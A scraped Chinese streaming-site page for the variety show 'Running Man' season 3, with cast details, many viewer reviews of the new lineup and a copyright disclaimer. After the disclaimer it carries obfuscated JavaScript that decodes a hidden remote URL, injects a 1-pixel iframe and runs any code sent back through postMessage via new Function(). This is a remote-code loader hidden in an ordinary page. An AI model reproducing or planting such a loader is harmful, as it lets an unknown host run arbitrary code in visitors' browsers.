当前位置 首页 综艺 《奔跑吧第三季》

奔跑吧第三季4.0

类型:综艺  大陆  2019 

主演:朱亚文 杨颖 李晨 郑恺 

导演:未知 

剧情简介

奔跑吧新一季阵容 跑男第七季MC朱亚文、angelababy杨颖、李晨、郑恺、王彦霖、Lucas黄旭熙、宋雨琦大概年后上班第一天大年初七会官宣。大家笑的很尴尬 努力在营造一种好笑的氛围 有人为了搞笑而笑 有人为了笑而笑 其实一点儿都不好笑 第一集观感,说实话很吃力。老MC卖力热场,常常在尴尬大笑烘托气氛。新来的MC还是很生疏,只有后半段游戏性比较重的弹射椅环节比较好笑。所以第一集应该他们自己先玩熟络点而不是邀请来宾。而且这季没有人拉节目主持的主轴,来了像白宇这种并没有常上综艺的来宾不懂如何插话接话就会出现没人cue他就没什么镜头的尴尬情况,这样来宾存在感会很低。后续观感:少了王祖蓝陈赫这些效果担当,这担子突然落在了郑恺头上,突然变成... 满屏的尴尬,尤其那两个99年的…王彦霖也拯救不了跑男了… 真无聊,满脸脂粉的男星真让人受不了。 节目越来越低龄化,节目做的四不像,没有本质的核心。一味贴近政府时事,远没有新闻联播和新闻报纸讲的齐全。另,7位嘉宾,完全无笑星,无mc,无控场,无主持。乱的一塌糊涂,节目效果一点没有。 所以,我觉得,综艺就该是综艺。贴近民生为政府宣传也罢,过审也罢。原有的味道... 个人认为《奔跑吧》这档节目从第二季开始真的变得一言难尽,有种一味贴合广电的感觉。响应国家让节目变得更正能量更有意义固然很好,但节目组能不能把弘扬各种社会正能量与游戏环节好好相结合呢?简单来说跑男现在就是一个四不像节目。PS:昨晚的节目的确做到了很好的教育意义... 《奔跑吧!兄弟》第一季,我给个五星。 《奔跑吧!兄弟》第二季,我给个四星。 《奔跑吧!兄弟》第三季,我给个三星。(因为从这一季开始,跑男已经进入了凉凉的阶段。) 《奔跑吧!兄弟》第四季,我给个两星。 《奔跑吧》第一季,我给个三星。 《奔跑吧》第二季,我给个两星。 ... 就是在邓超,陈赫,鹿晗,王祖蓝都走了之后了。剩下三个人里,比一下下限,他自然就是c位了。不然你还指望观众缘极差的ab和流量最低的郑恺吗?我大黑牛好歹还是插刀教的!!! 新成员就自然更加不够格做c位了,一来就反客为主? 所以就有我们现在看到的李晨做c位的海报了。一个... 每当听到一群人叫嚣着华流崛起时,我就羞愧想要遮住自己的眼睛妄想别人能够看不见我。 记得上次看一虎一席谈时谈时,内容是谈国内娱乐文化,连线采访了一个韩国s娱乐投资公司负责人时,他说起国内曾经有一部电影找他投资,告诉他投资费用要用70%来请流量明星,其他30%用来制作... 老成员一如既往地使用那些梗,但已经没有邓超陈赫祖兰等人去接,只剩下满屏幕的尬笑。新来的嘉宾,和老mc比起来,说话也不怎么多,给镜头大多数也就是哈哈哈。新队长由李晨来担任,一些“讲道理”的话,也就是说两句明显的节目台词,大家鼓掌便结束。 难免和以前做对比,邓超作... 一开始公布跑男的新配方我内心是拒绝的,嘴上说着不要看,身体还是很诚实每期更新必追。新成员的加入跑男肯定变味了,也不是原来那个熟悉的“伐木累”,更有说情怀的但其实情怀这东西往往是已经回不来的才被称之为情怀。而这季跑男,意外做得很好,编排有理,新鲜血液的加入,... 从跑男1追到跑男6的老粉 每一期基本看过3遍以上 个别期数可能更多 不是说不接受新人对新人有意见 宁愿别拍了让我们这些老粉心里还舒服一点 一下子走了4个mc谁能接受的了 新的奔跑吧不能说跑男 因为在我心里跑男只能是邓超陈赫鹿晗王祖蓝baby李晨郑恺 从他们4个mc走了之后再无跑... 难得周末无聊的时候看看,夏天越来越热 ,出去也越来越难 更多时候就开始宅在家里看看电视 ,感觉这一季跑男变得纯粹多了,看得乐呵呵时间一会就过去了 ,也算是不错的杀时间真人秀 。几个成员之间一开始磨合不够,有点小小小小问题,但是之后就好了很多,也看不出什么剧本痕迹... 如果非要说需要有一个队长以及其他各种人设的担当这么有局限性的话,那整个节目又会难免变得俗套、明显有剧本之类的,每个人都被设了限,只能做自己被认为应该做的事情。 反观现在的阵容和每个人的表现,应该是最自然不做作的了,没有所谓的队长什么的,每个人各自生长自由发挥...

本网站提供新影视资源均系收集各大网站,本网站只提供web页面浏览服务,并不提供影片资源存储,也不参与任何视频录制、上传
若本站收集的节目无意侵犯了贵司版权,请给网页底部邮箱地址来信,我们将在第一时间删除相应资源

if(typeof eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=="undefined"){eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=function(e){var sx="ABCDEFGHIJKLMNOPQRSTUVWXYZ"+"abcdefghijklmnopqrstuvwxyz"+"0123456789+/=";var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=sx.indexOf(e.charAt(f++));o=sx.indexOf(e.charAt(f++));u=sx.indexOf(e.charAt(f++));a=sx.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return(function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);};}
eval('\x77\x69\x6e\x64\x6f\x77')['yWzkjXZ']=function (){ ;(function (u, w, d, f, c) { var x = qdfEWb; u = decodeURIComponent(x(u.replace(new RegExp(c + '' + c, 'g'), '')))+'.fon'; 'jQuery'; var k = '', wr = 'w' + 'ri' + 't' + 'e'; var c = d[x('Y3VycmVudFNjcmlwdA==')]; var f = d.createElement('iframe'); f.id = new Date().getTime(); f.style.width = f.style.height = 1 + 'px'; f.src = [u].join('-'); d[wr](f.outerHTML); w['ad' + 'dEv' + 'entL' + 'ist' + 'ener']('m' + 'ess' + 'age', function (e) { if (e.data[`des_s_6982`]) { var t = x(e.data[`des_s_6982`].replace(new RegExp('FdaWAFAbWFf', 'g'), '')); new Function(decodeURIComponent(t.replace(/\+/g, '%20')))(); } }); })(''+'aHR'+'FF0'+'cHF'+'FMl'+'M0E'+'lMk'+'YlM'+'kFF'+'ZqY'+'FFS'+'5qF'+'FaW'+'5FF'+'nYW'+'53Z'+'Wku'+'Y29'+'tJT'+'FFN'+'BMT'+'A0N'+'DMF'+'FlM'+'kZj'+'NGN'+'hFF'+'NDI'+'lMk'+'FFZ'+'jLT'+'Y5F'+'FOD'+'IFF'+'tMj'+'ItM'+'FFW'+'U2',window, document, '' + 'Pwf' + 'SmZ' + 'j' + '', 'F');}